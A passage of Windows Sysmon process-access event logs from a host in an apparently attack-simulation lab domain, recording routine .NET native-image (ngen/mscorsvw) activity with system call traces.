\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.372\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.372","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.372\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.372","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.372\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.372","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.419\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.419","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.419\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.419","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.481\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00101D8B0B00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.481","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00101D8B0B00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
